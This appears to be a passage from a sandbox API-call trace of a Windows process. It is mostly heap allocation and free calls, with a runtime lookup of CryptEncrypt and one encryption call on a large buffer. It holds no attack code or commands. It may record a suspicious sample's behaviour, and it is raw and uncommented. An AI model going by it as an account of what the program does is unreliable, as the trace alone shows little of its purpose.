| out: lpMsg=0x8bf3c0) returned 0 [0189.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0189.113] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.113] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0189.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.113] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0189.114] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0189.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0189.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0189.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0189.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.114] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0189.114] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0189.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0189.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0189.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0189.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0189.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0189.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0189.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0189.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0189.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0189.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0189.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0189.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0189.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34d8a90 | out: hHeap=0x25c0000) returned 1 [0189.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0189.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.117] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0189.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0189.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0189.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0189.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0189.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa418, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0189.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.120] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0189.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6c88 [0189.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0189.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0189.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0189.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0189.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0189.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0189.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0189.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0189.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0189.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0189.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0189.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0189.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0189.121] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x13415, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x13418) returned 1 [0189.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0189.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0189.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0189.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0189.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0189.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0189.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0189.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0189.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0189.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0189.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0189.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0189.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0189.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0189.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0189.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0189.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0189.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0189.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0189.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0189.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0189.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0189.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0189.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0189.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0189.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0189.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0189.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0189.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0189.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0189.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0189.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0189.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0189.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0189.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0189.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0189.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0189.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0189.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0189.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0189.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0189.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0189.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0189.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0189.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0189.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0189.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0189.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0189.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0189.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0189.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0189.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0189.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0189.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0189.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0189.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0189.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0189.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0189.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0189.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0189.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0189.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0189.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0189.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0189.125] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0189.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0189.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0189.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0189.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0189.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0189.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0189.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0189.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0189.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0189.125] CharLowerBuffW (in: lpsz="byte[78872]", cchLength=0xb | out: lpsz="byte[78872]") returned 0xb [0189.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0189.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0189.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0189.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0189.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0189.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0189.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0189.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0189.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0189.126] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 